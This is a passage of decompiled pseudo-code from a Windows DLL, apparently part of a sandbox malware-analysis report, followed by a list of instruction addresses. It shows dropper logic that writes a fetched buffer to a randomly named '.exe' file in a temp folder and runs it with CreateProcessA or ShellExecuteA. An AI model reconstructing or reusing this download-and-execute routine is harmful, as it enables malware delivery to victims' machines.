					_t546 = _t546 + 1;
					_t649 = _t468;
					if(_t468 != 0) {
						goto L2;
					} else {
						_push(_t546 - _t575);
						_push( &_v300);
					}
				}
				E10001970( &_v588);
				_t280 = E10006494( &_v588, _t649);
				asm("cdq");
				_t282 = E10001EB0( &_v640, _t280 % 7 + 5);
				_push(_t282);
				_v16 = 1;
				L151();
				_t623 = _t622 + 4;
				_v16 = 2;
				_t551 = _t282;
				if( *((intOrPtr*)(_t282 + 0x14)) >= 0x10) {
					_t551 =  *_t282;
				}
				_t487 =  *((intOrPtr*)(_t282 + 0x10));
				_t591 = _v572;
				_v592 = _t487;
				_push(_t487);
				_push(_t551);
				if(_t487 > _v568 - _t591) {
					_v592 = 0;
					_push(_v592);
					_push(_t487);
					E10002E00(_t471,  &_v588, _t577, _t591);
				} else {
					_v572 = _t591 + _t487;
					_t465 =  >=  ? _v588 :  &_v588;
					_t591 = _t591 + ( >=  ? _v588 :  &_v588);
					_push(_t591);
					E10005BC0();
					_t623 = _t623 + 0xc;
					 *((char*)(_t591 + _v592)) = 0;
				}
				_v16 = 1;
				_t552 = _v596;
				if(_t552 < 0x10) {
					L16:
					_v16 = 0;
					_t553 = _v620;
					_v600 = 0;
					_v596 = 0xf;
					_v616 = 0;
					if(_t553 < 0x10) {
						L20:
						_t287 =  >=  ? _v588 :  &_v588;
						if(CreateDirectoryA( >=  ? _v588 :  &_v588, 0) != 0 || GetLastError() == 0xb7) {
							L48:
							asm("movups xmm0, [ebp-0x240]");
							 *_t577 = 0;
							_t577[4] = 0;
							_t577[5] = 0;
							asm("movups [edi], xmm0");
							asm("movq xmm0, [ebp-0x230]");
							asm("movq [edi+0x10], xmm0");
							goto L49;
						} else {
							if(GetTempPathA(0x104,  &_v564) < 0) {
								_t554 = E100065B3(_t471, _t577, _t591, __eflags, "TMPDIR");
								_t623 = _t623 + 4;
								_t493 = _t554;
								_t59 = _t493 + 1; // 0x1
								_t593 = _t59;
								do {
									_t295 =  *_t493;
									_t493 = _t493 + 1;
									__eflags = _t295;
								} while (_t295 != 0);
								_t494 = _t493 - _t593;
								__eflags = _t494;
								_push(_t494);
								_push(_t554);
							} else {
								_t542 =  &_v564;
								_t573 = _t542 + 1;
								do {
									_t452 =  *_t542;
									_t542 = _t542 + 1;
									_t663 = _t452;
								} while (_t452 != 0);
								_push(_t542 - _t573);
								_push( &_v564);
							}
							E10001970( &_v588);
							_t297 = E10006494( &_v588, _t663);
							asm("cdq");
							_t299 = E10001EB0( &_v640, _t297 % 7 + 5);
							_push(_t299);
							_v16 = 3;
							L151();
							_t623 = _t623 + 4;
							_v16 = 4;
							_t557 = _t299;
							if( *((intOrPtr*)(_t299 + 0x14)) >= 0x10) {
								_t557 =  *_t299;
							}
							_t499 =  *((intOrPtr*)(_t299 + 0x10));
							_t591 = _v572;
							_v592 = _t499;
							_push(_t499);
							_push(_t557);
							if(_t499 > _v568 - _t591) {
								_v592 = 0;
								_push(_v592);
								_push(_t499);
								E10002E00(_t471,  &_v588, _t577, _t591);
							} else {
								_v572 = _t591 + _t499;
								_t449 =  >=  ? _v588 :  &_v588;
								_t591 = _t591 + ( >=  ? _v588 :  &_v588);
								_push(_t591);
								E10005BC0();
								_t623 = _t623 + 0xc;
								 *((char*)(_t591 + _v592)) = 0;
							}
							_t558 = _v596;
							if(_t558 < 0x10) {
								L38:
								_t553 = _v620;
								_v600 = 0;
								_v596 = 0xf;
								_v616 = 0;
								if(_t553 < 0x10) {
									L42:
									_t304 =  >=  ? _v588 :  &_v588;
									if(CreateDirectoryA( >=  ? _v588 :  &_v588, 0) != 0 || GetLastError() == 0xb7) {
										goto L48;
									} else {
										_t553 = _v568;
										 *_t577 = 0;
										_t577[4] = 0;
										_t577[5] = 0xf;
										 *_t577 = 0;
										if(_t553 < 0x10) {
											L49:
											 *[fs:0x0] = _v24;
											_pop(_t578);
											_pop(_t592);
											return E100031FF(_t577, _t471, _v32 ^ _t608, _t553, _t578, _t592);
										} else {
											_t501 = _v588;
											_t553 = _t553 + 1;
											_t307 = _t501;
											if(_t553 < 0x1000) {
												L47:
												_push(_t553);
												E10003216(_t501);
												goto L49;
											} else {
												_t501 =  *(_t501 - 4);
												_t553 = _t553 + 0x23;
												if(_t307 - _t501 + 0xfffffffc > 0x1f) {
													goto L52;
												} else {
													goto L47;
												}
											}
										}
									}
								} else {
									_t540 = _v640;
									_t553 = _t553 + 1;
									_t438 = _t540;
									if(_t553 < 0x1000) {
										L41:
										_push(_t553);
										E10003216(_t540);
										_t623 = _t623 + 8;
										goto L42;
									} else {
										_t501 =  *(_t540 - 4);
										_t553 = _t553 + 0x23;
										if(_t438 -  *(_t540 - 4) + 0xfffffffc > 0x1f) {
											goto L51;
										} else {
											goto L41;
										}
									}
								}
							} else {
								_t541 = _v616;
								_t572 = _t558 + 1;
								_t443 = _t541;
								if(_t572 < 0x1000) {
									L37:
									_push(_t572);
									E10003216(_t541);
									_t623 = _t623 + 8;
									goto L38;
								} else {
									_t501 =  *(_t541 - 4);
									_t553 = _t572 + 0x23;
									if(_t443 -  *(_t541 - 4) + 0xfffffffc > 0x1f) {
										goto L51;
									} else {
										goto L37;
									}
								}
							}
						}
					} else {
						_t544 = _v640;
						_t553 = _t553 + 1;
						_t454 = _t544;
						if(_t553 < 0x1000) {
							L19:
							_push(_t553);
							E10003216(_t544);
							_t623 = _t623 + 8;
							goto L20;
						} else {
							_t501 =  *(_t544 - 4);
							_t553 = _t553 + 0x23;
							if(_t454 -  *(_t544 - 4) + 0xfffffffc > 0x1f) {
								goto L50;
							} else {
								goto L19;
							}
						}
					}
				} else {
					_t545 = _v616;
					_t574 = _t552 + 1;
					_t459 = _t545;
					if(_t574 < 0x1000) {
						L15:
						_push(_t574);
						E10003216(_t545);
						_t623 = _t623 + 8;
						goto L16;
					} else {
						_t501 =  *(_t545 - 4);
						_t553 = _t574 + 0x23;
						if(_t459 -  *(_t545 - 4) + 0xfffffffc > 0x1f) {
							L50:
							E1000633C(_t471, _t501, _t553, __eflags);
							L51:
							E1000633C(_t471, _t501, _t553, __eflags);
							L52:
							E1000633C(_t471, _t501, _t553, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t608);
							_t610 = _t623;
							_t628 = (_t623 & 0xfffffff0) - 0x228;
							_t312 =  *0x10017004; // 0x79eab102
							_v692 = _t312 ^ _t628;
							_push(_t591);
							_t594 = _v676;
							_push(_t577);
							_t579 = _v680;
							E100064B5(_t501, E10006436(_t501, _t553, 0));
							E10004730(_t579,  &_v1024, 0, 0x148);
							_v1012 = _t594;
							_v1020 = 0x7a120;
							_push(0x7a120); // executed
							_t318 = E1000320D(_t471, _t579, _t594, __eflags); // executed
							_v1024 = _t318;
							E10004730(_t579, _t318, 0, _v1020);
							_t320 = _v980;
							_t633 = _t628 + 0x24;
							_v988 = 0xfde9;
							_v968 = 0;
							_v964 = 0;
							_v960 = 0;
							_v972 = 0;
							__eflags = _t320;
							if(_t320 != 0) {
								E10003224(_t320);
								_t633 = _t633 + 4;
								_v980 = 0;
							}
							_push(_t579);
							_t321 = E100014F0( &_v1024); // executed
							__eflags = _t321;
							if(_t321 == 0) {
								_t595 = 0xfffffffd;
								goto L113;
							} else {
								__eflags = _v980;
								if(_v980 == 0) {
									L111:
									_t595 = 0;
									goto L113;
								} else {
									_t327 = _v968;
									__eflags = _t327;
									if(_t327 == 0) {
										goto L111;
									} else {
										__eflags = _t327 - 2;
										if(_t327 <= 2) {
											goto L111;
										} else {
											__eflags = _t327 - 0xc00;
											if(_t327 <= 0xc00) {
												_t595 = _t594 | 0xffffffff;
												goto L113;
											} else {
												E10001F90( &_v1156, _t579);
												__eflags = _v1140;
												if(__eflags == 0) {
													_t595 = 0xfffffffe;
													goto L106;
												} else {
													_t377 = E10006494( &_v1156, __eflags);
													asm("cdq");
													_t379 = E10001EB0(_t633 + 0x24, _t377 % 7 + 5);
													_push(_t379);
													L151();
													_t524 = _t379;
													_t633 = _t633 + 4;
													_t579 =  *(_t524 + 0x14);
													_t603 =  *(_t524 + 0x10);
													__eflags = _t579 - _t603 - 4;
													if(_t579 - _t603 < 4) {
														_push(4);
														_v1232 = 0;
														_t524 = E10002E00(_t471, _t524, _t579, _t603, 4, _v1232, ".exe");
													} else {
														_t571 = _t524;
														 *(_t524 + 0x10) = _t603 + 4;
														__eflags = _t579 - 0x10;
														if(_t579 >= 0x10) {
															_t571 =  *_t524;
														}
														_t436 = ".exe"; // 0x6578652e
														 *(_t571 + _t603) = _t436;
														 *((char*)(_t571 + _t603 + 4)) = 0;
													}
													asm("movups xmm1, [ecx]");
													asm("movq xmm0, [ecx+0x10]");
													asm("movq [esp+0x80], xmm0");
													__eflags =  *((intOrPtr*)(_t633 + 0x84)) - 0x10;
													 *(_t524 + 0x10) = 0;
													 *(_t524 + 0x14) = 0xf;
													 *_t524 = 0;
													_t604 = _v1140;
													_t525 = _v1116;
													asm("movd edi, xmm1");
													_push(_t525);
													asm("movaps [esp+0x74], xmm1");
													_t564 =  >=  ? _t579 :  &(_v1136.hThread);
													_push( >=  ? _t579 :  &(_v1136.hThread));
													__eflags = _t525 - _v1136.hProcess - _t604;
													if(_t525 > _v1136.hProcess - _t604) {
														_v1236 = 0;
														_push(_v1236);
														_push(_t525);
														_t385 = E10002E00(_t471,  &_v1156, _t579, _t604);
														_t579 =  *(_t633 + 0x70);
														_t595 = _t385;
													} else {
														__eflags = _v1136.hProcess - 0x10;
														_v1140 = _t525 + _t604;
														_t432 =  >=  ? _v1156 :  &_v1156;
														_t605 = _t604 + ( >=  ? _v1156 :  &_v1156);
														_push(_t605);
														E10005BC0();
														_t633 = _t633 + 0xc;
														 *((char*)(_t605 + _v1116)) = 0;
														_t595 =  &_v1156;
													}
													 *(_t633 + 0x40) = 0;
													_v1168 = 0;
													 *(_t633 + 0x54) = 0;
													__eflags =  *((intOrPtr*)(_t595 + 0x14)) - 0x10;
													_t386 =  *(_t595 + 0x10);
													_v1240 = _t386;
													if( *((intOrPtr*)(_t595 + 0x14)) >= 0x10) {
														_t595 =  *_t595;
													}
													__eflags = _t386 - 0x10;
													if(_t386 >= 0x10) {
														_t387 = _t386 | 0x0000000f;
														__eflags = _t387 - 0x7fffffff;
														_t388 =  >  ? 0x7fffffff : _t387;
														_v1188 = _t388;
														_t531 =  ~(0 | _t387 - 0x7fffffff > 0x00000000) | _t388 + 0x00000001;
														__eflags = _t531 - 0x1000;
														if(_t531 < 0x1000) {
															__eflags = _t531;
															if(__eflags == 0) {
																_t532 = 0;
																__eflags = 0;
															} else {
																_push(_t531);
																_t426 = E10003229(_t471, _t579, _t595, __eflags);
																_t633 = _t633 + 4;
																_t532 = _t426;
															}
															goto L80;
														} else {
															_t170 = _t531 + 0x23; // 0x23
															_t427 = _t170;
															__eflags = _t427 - _t531;
															if(__eflags <= 0) {
																E10001DE0(_t471);
																goto L115;
															} else {
																_push(_t427);
																_t429 = E10003229(_t471, _t579, _t595, __eflags);
																_t633 = _t633 + 4;
																__eflags = _t429;
																if(__eflags == 0) {
																	goto L115;
																} else {
																	_t171 = _t429 + 0x23; // 0x23
																	_t532 = _t171 & 0xffffffe0;
																	 *(_t532 - 4) = _t429;
																	L80:
																	__eflags = _v1240 + 1;
																	 *(_t633 + 0x40) = _t532;
																	E10005BC0(_t532, _t595, _v1240 + 1);
																	_t633 = _t633 + 0xc;
																	_v1168 = _v1240;
																	 *(_t633 + 0x54) = _v1188;
																	goto L81;
																}
															}
														}
													} else {
														asm("movups xmm0, [esi]");
														_v1168 = _t386;
														 *(_t633 + 0x54) = 0xf;
														asm("movups [esp+0x40], xmm0");
														L81:
														_t395 = _v1116;
														__eflags = _t395 - 0x10;
														if(_t395 < 0x10) {
															L85:
															_t565 = _v1216;
															__eflags = _t565 - 0x10;
															if(_t565 < 0x10) {
																L89:
																_t566 = _v1192;
																_v1220 = 0;
																_v1216 = 0xf;
																_v1236 = 0;
																__eflags = _t566 - 0x10;
																if(_t566 < 0x10) {
																	L93:
																	__eflags =  *(_t633 + 0x54) - 0x10;
																	_t397 =  >=  ?  *(_t633 + 0x40) : _t633 + 0x40;
																	__eflags = _v984;
																	if(_v984 != 0) {
																		__eflags = _v972;
																		if(_v972 != 0) {
																			_t595 = CreateFileA(_t397, 0x40000000, 1, 0, 2, 0x80, 0);
																			__eflags = _t595 - 0xffffffff;
																			if(_t595 != 0xffffffff) {
																				_v1188 = 0;
																				WriteFile(_t595, _v984, _v972,  &_v1188, 0);
																				CloseHandle(_t595);
																			}
																		}
																	}
																	__eflags =  *(_t633 + 0x54) - 0x10;
																	 *(_t633 + 0x9c) = 0x44;
																	asm("xorps xmm0, xmm0");
																	_t399 =  >=  ?  *((void*)(_t633 + 0x58)) : _t633 + 0x58;
																	asm("movlpd [esp+0xc4], xmm0");
																	asm("movlpd [esp+0xcc], xmm0");
																	asm("movlpd [esp+0xd4], xmm0");
																	asm("movlpd [esp+0xdc], xmm0");
																	asm("movlpd [esp+0xe4], xmm0");
																	asm("movlpd [esp+0xec], xmm0");
																	asm("movlpd [esp+0xf4], xmm0");
																	asm("movlpd [esp+0xfc], xmm0");
																	asm("movaps [esp+0x98], xmm0");
																	_t400 = CreateProcessA( >=  ?  *((void*)(_t633 + 0x58)) : _t633 + 0x58, 0, 0, 0, 0, 0, 0, 0, _t633 + 0x9c,  &_v1136);
																	__eflags = _t400;
																	if(_t400 == 0) {
																		L99:
																		__eflags =  *(_t633 + 0x54) - 0x10;
																		_t402 =  >=  ?  *((void*)(_t633 + 0x44)) : _t633 + 0x40;
																		ShellExecuteA(0, "open",  >=  ?  *((void*)(_t633 + 0x44)) : _t633 + 0x40, 0, 0, 0xa);
																	} else {
																		__eflags =  *((intOrPtr*)(_t633 + 0x78)) - 0xffffffff;
																		if( *((intOrPtr*)(_t633 + 0x78)) == 0xffffffff) {
																			goto L99;
																		}
																	}
																	_t567 =  *(_t633 + 0x54);
																	__eflags = _t567 - 0x10;
																	if(_t567 < 0x10) {
																		L104:
																		_t595 = 1;
																		L106:
																		_t553 = _v1136.hThread;
																		__eflags = _t553 - 0x10;
																		if(_t553 < 0x10) {
																			L113:
																			E10003224(_v1020); // executed
																			E10003224(_v980); // executed
																			E10003224(_v976);
																			__imp__CoUninitialize();
																			_pop(_t580);
																			_pop(_t596);
																			__eflags =  *(_t633 + 0x238) ^ _t633 + 0xc;
																			return E100031FF(_t595, _t471,  *(_t633 + 0x238) ^ _t633 + 0xc, _t553, _t580, _t596);
																		} else {
																			_t506 = _v1152;
																			_t553 = _t553 + 1;
																			_t329 = _t506;
																			__eflags = _t553 - 0x1000;
																			if(_t553 < 0x1000) {
																				L109:
																				_push(_t553);
																				E10003216(_t506);
																				_t633 = _t633 + 8;
																				goto L113;
																			} else {
																				_t506 =  *(_t506 - 4);
																				_t553 = _t553 + 0x23;
																				__eflags = _t329 - _t506 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L117;
																				} else {
																					goto L109;
																				}
																			}
																		}
																	} else {
																		_t535 =  *(_t633 + 0x40);
																		_t568 = _t567 + 1;
																		_t404 = _t535;
																		__eflags = _t568 - 0x1000;
																		if(_t568 < 0x1000) {
																			L103:
																			_push(_t568);
																			E10003216(_t535);
																			_t633 = _t633 + 8;
																			goto L104;
																		} else {
																			_t506 =  *(_t535 - 4);
																			_t553 = _t568 + 0x23;
																			__eflags = _t404 - _t506 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L116;
																			} else {
																				goto L103;
																			}
																		}
																	}
																} else {
																	_t536 =  *((intOrPtr*)(_t633 + 0x24));
																	_t569 = _t566 + 1;
																	_t413 = _t536;
																	__eflags = _t569 - 0x1000;
																	if(_t569 < 0x1000) {
																		L92:
																		_push(_t569);
																		E10003216(_t536);
																		_t633 = _t633 + 8;
																		goto L93;
																	} else {
																		_t506 =  *(_t536 - 4);
																		_t553 = _t569 + 0x23;
																		__eflags = _t413 - _t506 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L115;
																		} else {
																			goto L92;
																		}
																	}
																}
															} else {
																_t537 = _v1236;
																_t570 = _t565 + 1;
																_t418 = _t537;
																__eflags = _t570 - 0x1000;
																if(_t570 < 0x1000) {
																	L88:
																	_push(_t570);
																	E10003216(_t537);
																	_t633 = _t633 + 8;
																	goto L89;
																} else {
																	_t506 =  *(_t537 - 4);
																	_t553 = _t570 + 0x23;
																	__eflags = _t418 - _t506 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L115;
																	} else {
																		goto L88;
																	}
																}
															}
														} else {
															_t538 = _t395 + 1;
															_t422 = _t579;
															__eflags = _t538 - 0x1000;
															if(_t538 < 0x1000) {
																L84:
																_push(_t538);
																E10003216(_t579);
																_t633 = _t633 + 8;
																goto L85;
															} else {
																_t579 =  *(_t579 - 4);
																_t506 = _t538 + 0x23;
																__eflags = _t422 - _t579 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L115:
																	E1000633C(_t471, _t506, _t553, __eflags);
																	L116:
																	E1000633C(_t471, _t506, _t553, __eflags);
																	L117:
																	E1000633C(_t471, _t506, _t553, __eflags);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t610);
																	_t612 = _t633;
																	_t638 = _t633 - 0xc;
																	_push(_t595);
																	_t597 = _t506;
																	_push(_t579);
																	_t581 = _v1236;
																	_t334 = _t597[4];
																	 *(_t612 - 8) = _t334;
																	__eflags = _t334 - _t581;
																	if(_t334 > _t581) {
																		L147:
																		return _t334;
																	} else {
																		_push(_t471);
																		_t473 = _t597[5];
																		_v32 = _t473;
																		__eflags = _t473 - _t581;
																		if(__eflags == 0) {
																			L146:
																			goto L147;
																		} else {
																			if(__eflags >= 0) {
																				__eflags = _t581 - 0x10;
																				if(_t581 >= 0x10) {
																					goto L146;
																				} else {
																					__eflags = _t473 - 0x10;
																					if(_t473 < 0x10) {
																						goto L146;
																					} else {
																						_t583 =  *_t597;
																						E10005BC0(_t597, _t583, _t334 + 1);
																						_t638 = _t638 + 0xc;
																						_t508 = _t597[5] + 1;
																						__eflags = _t508 - 0x1000;
																						if(_t508 < 0x1000) {
																							L145:
																							_push(_t508);
																							_t334 = E10003216(_t583);
																							_t597[5] = 0xf;
																							goto L146;
																						} else {
																							_t559 =  *(_t583 - 4);
																							_t508 = _t508 + 0x23;
																							_t581 = _t583 - _t559;
																							_t248 = _t581 - 4; // -3
																							__eflags = _t248 - 0x1f;
																							if(__eflags > 0) {
																								goto L148;
																							} else {
																								_t583 = _t559;
																								goto L145;
																							}
																						}
																					}
																				}
																			} else {
																				_t559 = 0x7fffffff;
																				_t508 = _t581 - _t334;
																				__eflags = 0x7fffffff - _v28 - _t508;
																				if(0x7fffffff - _v28 < _t508) {
																					L149:
																					E10001CA0(_t508);
																					goto L150;
																				} else {
																					_t514 = _t581 | 0x0000000f;
																					__eflags = _t514 - 0x7fffffff;
																					if(__eflags <= 0) {
																						_t361 = _t473 >> 1;
																						_t559 = 0x7fffffff - _t361;
																						__eflags = _t473 - 0x7fffffff - _t361;
																						if(__eflags <= 0) {
																							_t362 = _t361 + _t473;
																							__eflags = _t514 - _t362;
																							_t515 =  <  ? _t362 : _t514;
																							_v24 = _t515;
																							_t363 = _t515;
																						} else {
																							_t363 = 0x7fffffff;
																							_v24 = 0x7fffffff;
																						}
																					} else {
																						_t363 = 0x7fffffff;
																						_v24 = 0x7fffffff;
																					}
																					_t508 =  ~(0 | __eflags > 0x00000000) | _t363 + 0x00000001;
																					__eflags = _t508 - 0x1000;
																					if(_t508 < 0x1000) {
																						__eflags = _t508;
																						if(__eflags == 0) {
																							_t473 = 0;
																							__eflags = 0;
																						} else {
																							_push(_t508);
																							_t374 = E10003229(_t473, _t581, _t597, __eflags);
																							_t638 = _t638 + 4;
																							_t473 = _t374;
																						}
																						goto L134;
																					} else {
																						_t231 = _t508 + 0x23; // 0x23
																						_t375 = _t231;
																						__eflags = _t375 - _t508;
																						if(__eflags <= 0) {
																							L150:
																							E10001DE0(_t473);
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							_push(_t612);
																							_t614 = _t638;
																							_push(_t508);
																							_push(_t473);
																							_push(_t597);
																							_t599 =  *((intOrPtr*)(_t614 + 8));
																							_t475 = _t508;
																							 *(_t614 - 4) = _t475;
																							_t560 =  *(_t599 + 0x14);
																							_t509 =  *(_t599 + 0x10);
																							__eflags = _t560 - _t509 - 1;
																							if(_t560 - _t509 < 1) {
																								_push(1);
																								_v16 = 0;
																								_push(_v16);
																								_push(1);
																								_t599 = E10002F60(_t475, _t599, _t581, _t599);
																							} else {
																								_t254 = _t509 + 1; // 0x1
																								 *(_t599 + 0x10) = _t254;
																								_push(_t581);
																								_t584 = _t599;
																								__eflags = _t560 - 0x10;
																								if(_t560 >= 0x10) {
																									_t584 =  *_t599;
																								}
																								__eflags = _t584 - 0x10014e71;
																								if(_t584 >= 0x10014e71) {
																									L159:
																									_v16 = 1;
																								} else {
																									__eflags = _t584 + _t509 - "\\";
																									if(_t584 + _t509 < "\\") {
																										goto L159;
																									} else {
																										__eflags = _t584 - "\\";
																										if(_t584 > "\\") {
																											_v16 = _t584 - "\\";
																										} else {
																											_v16 = 0;
																										}
																									}
																								}
																								_t260 = _t509 + 1; // 0x1
																								E10005BC0(_t584 + 1, _t584, _t260);
																								E10005BC0(_t584, "\\", _v16);
																								_t264 = _v16 + 0x10014e71; // 0x10014e72
																								E10005BC0(_t584 + _v16, _t264, 1 - _v16);
																							}
																							 *_t475 = 0;
																							_t475[4] = 0;
																							_t475[5] = 0;
																							asm("movups xmm0, [esi]");
																							asm("movups [ebx], xmm0");
																							asm("movq xmm0, [esi+0x10]");
																							asm("movq [ebx+0x10], xmm0");
																							 *(_t599 + 0x10) = 0;
																							 *(_t599 + 0x14) = 0xf;
																							 *_t599 = 0;
																							return _t475;
																						} else {
																							_push(_t375);
																							_t376 = E10003229(_t473, _t581, _t597, __eflags);
																							_t638 = _t638 + 4;
																							__eflags = _t376;
																							if(__eflags == 0) {
																								L148:
																								E1000633C(_t473, _t508, _t559, __eflags);
																								goto L149;
																							} else {
																								_t232 = _t376 + 0x23; // 0x23
																								_t473 = _t232 & 0xffffffe0;
																								 *(_t473 - 4) = _t376;
																								L134:
																								_t597[5] = _v24;
																								_t597[4] = _t581;
																								__eflags = _v32 - 0x10;
																								_push(_v28 + 1);
																								if(_v32 < 0x10) {
																									_push(_t597);
																									_push(_t473);
																									E10005BC0();
																									_t369 = _v28;
																									 *_t597 = _t473;
																									_t597[4] = _t369;
																									return _t369;
																								} else {
																									_t587 =  *_t597;
																									_push(_t587);
																									_push(_t473);
																									E10005BC0();
																									_t638 = _t638 + 0xc;
																									_t520 = _v32 + 1;
																									__eflags = _t520 - 0x1000;
																									if(_t520 < 0x1000) {
																										L138:
																										_push(_t520);
																										E10003216(_t587);
																										_t372 = _v28;
																										 *_t597 = _t473;
																										_t597[4] = _t372;
																										return _t372;
																									} else {
																										_t559 =  *(_t587 - 4);
																										_t508 = _t520 + 0x23;
																										_t581 = _t587 - _t559;
																										_t241 = _t581 - 4; // -3
																										__eflags = _t241 - 0x1f;
																										if(__eflags > 0) {
																											goto L148;
																										} else {
																											_t587 = _t559;
																											goto L138;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	goto L84;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						} else {
							goto L15;
						}
					}
				}
			}

0x10001f91
0x10001f99
0x10001fa0
0x10001fa4
0x10001fb5
0x10001fbb
0x10001fc0
0x10001fc2
0x10001fcb
0x10001fd1
0x10001fd3
0x10001fd9
0x10001fe3
0x10001fe9
0x10001ff3
0x10001ffd
0x10002004
0x1000200a
0x1000201a
0x10002022
0x1000204d
0x1000204f
0x10002052
0x10002054
0x10002054
0x10002057
0x10002057
0x10002059
0x1000205a
0x1000205a
0x1000205e
0x1000205e
0x10002060
0x10002061
0x10002024
0x10002024
0x1000202a
0x1000202a
0x10002030
0x10002030
0x10002032
0x10002033
0x10002035
0x00000000
0x10002037
0x1000203f
0x10002040
0x10002040
0x10002035
0x10002068
0x1000206d
0x10002072
0x10002083
0x10002088
0x1000208f
0x10002093
0x10002098
0x1000209b
0x1000209f
0x100020a5
0x100020a7
0x100020a7
0x100020a9
0x100020b2
0x100020ba
0x100020c0
0x100020c1
0x100020c4
0x100020fa
0x10002101
0x10002107
0x1000210e
0x100020c6
0x100020d0
0x100020dc
0x100020e3
0x100020e5
0x100020e6
0x100020f1
0x100020f4
0x100020f4
0x10002113
0x10002117
0x10002120
0x10002151
0x10002151
0x10002155
0x1000215b
0x10002165
0x1000216f
0x10002179
0x100021aa
0x100021b9
0x100021c9
0x100023ef
0x100023ef
0x100023f6
0x100023fc
0x10002403
0x1000240a
0x1000240d
0x10002415
0x00000000
0x100021e0
0x100021f4
0x1000221d
0x1000221f
0x10002222
0x10002224
0x10002224
0x10002227
0x10002227
0x10002229
0x1000222a
0x1000222a
0x1000222e
0x1000222e
0x10002230
0x10002231
0x100021f6
0x100021f6
0x100021fc
0x10002200
0x10002200
0x10002202
0x10002203
0x10002203
0x1000220f
0x10002210
0x10002210
0x10002238
0x1000223d
0x10002242
0x10002253
0x10002258
0x1000225f
0x10002263
0x10002268
0x1000226b
0x1000226f
0x10002275
0x10002277
0x10002277
0x10002279
0x10002282
0x1000228a
0x10002290
0x10002291
0x10002294
0x100022ca
0x100022d1
0x100022d7
0x100022de
0x10002296
0x100022a0
0x100022ac
0x100022b3
0x100022b5
0x100022b6
0x100022c1
0x100022c4
0x100022c4
0x100022e3
0x100022ec
0x1000231d
0x1000231d
0x10002323
0x1000232d
0x10002337
0x10002341
0x10002372
0x10002381
0x10002391
0x00000000
0x100023a0
0x100023a0
0x100023a6
0x100023ac
0x100023b3
0x100023ba
0x100023c0
0x1000241a
0x1000241f
0x10002427
0x10002428
0x10002439
0x100023c2
0x100023c2
0x100023c8
0x100023c9
0x100023d1
0x100023e3
0x100023e3
0x100023e5
0x00000000
0x100023d3
0x100023d3
0x100023d6
0x100023e1
0x00000000
0x00000000
0x00000000
0x00000000
0x100023e1
0x100023d1
0x100023c0
0x10002343
0x10002343
0x10002349
0x1000234a
0x10002352
0x10002368
0x10002368
0x1000236a
0x1000236f
0x00000000
0x10002354
0x10002354
0x10002357
0x10002362
0x00000000
0x00000000
0x00000000
0x00000000
0x10002362
0x10002352
0x100022ee
0x100022ee
0x100022f4
0x100022f5
0x100022fd
0x10002313
0x10002313
0x10002315
0x1000231a
0x00000000
0x100022ff
0x100022ff
0x10002302
0x1000230d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000230d
0x100022fd
0x100022ec
0x1000217b
0x1000217b
0x10002181
0x10002182
0x1000218a
0x100021a0
0x100021a0
0x100021a2
0x100021a7
0x00000000
0x1000218c
0x1000218c
0x1000218f
0x1000219a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000219a
0x1000218a
0x10002122
0x10002122
0x10002128
0x10002129
0x10002131
0x10002147
0x10002147
0x10002149
0x1000214e
0x00000000
0x10002133
0x10002133
0x10002136
0x10002141
0x1000243a
0x1000243a
0x1000243f
0x1000243f
0x10002444
0x10002444
0x10002449
0x1000244a
0x1000244b
0x1000244c
0x1000244d
0x1000244e
0x1000244f
0x10002450
0x10002451
0x10002456
0x1000245c
0x10002463
0x1000246a
0x1000246b
0x1000246e
0x1000246f
0x1000247d
0x10002494
0x1000249c
0x100024a3
0x100024ae
0x100024b3
0x100024bb
0x100024cc
0x100024d1
0x100024d8
0x100024db
0x100024e6
0x100024f1
0x100024fc
0x10002507
0x10002512
0x10002514
0x10002517
0x1000251c
0x1000251f
0x1000251f
0x1000252a
0x10002532
0x10002537
0x10002539
0x100029b4
0x00000000
0x1000253f
0x1000253f
0x10002547
0x100029b0
0x100029b0
0x00000000
0x1000254d
0x1000254d
0x10002554
0x10002556
0x00000000
0x1000255c
0x1000255c
0x1000255f
0x00000000
0x10002565
0x10002565
0x1000256a
0x100029ab
0x00000000
0x10002570
0x10002574
0x10002579
0x1000257e
0x10002972
0x00000000
0x10002584
0x10002584
0x10002589
0x10002598
0x1000259d
0x100025a2
0x100025a7
0x100025a9
0x100025ac
0x100025b1
0x100025b6
0x100025b9
0x100025d9
0x100025e0
0x100025f0
0x100025bb
0x100025be
0x100025c0
0x100025c3
0x100025c6
0x100025c8
0x100025c8
0x100025ca
0x100025cf
0x100025d2
0x100025d2
0x100025f2
0x100025f9
0x100025fe
0x10002607
0x1000260f
0x10002616
0x1000261d
0x10002624
0x10002628
0x1000262f
0x10002633
0x10002634
0x10002639
0x1000263e
0x1000263f
0x10002641
0x10002674
0x10002679
0x1000267d
0x10002682
0x10002687
0x1000268b
0x10002643
0x10002643
0x1000264b
0x10002653
0x10002658
0x1000265a
0x1000265b
0x10002667
0x1000266a
0x1000266e
0x1000266e
0x1000268d
0x10002695
0x1000269d
0x100026a5
0x100026a9
0x100026ac
0x100026b0
0x100026b2
0x100026b2
0x100026b4
0x100026b7
0x100026d2
0x100026da
0x100026dc
0x100026e1
0x100026ed
0x100026ef
0x100026f5
0x1000271e
0x10002720
0x1000272f
0x1000272f
0x10002722
0x10002722
0x10002723
0x10002728
0x1000272b
0x1000272b
0x00000000
0x100026f7
0x100026f7
0x100026f7
0x100026fa
0x100026fc
0x10002a02
0x00000000
0x10002702
0x10002702
0x10002703
0x10002708
0x1000270b
0x1000270d
0x00000000
0x10002713
0x10002713
0x10002716
0x10002719
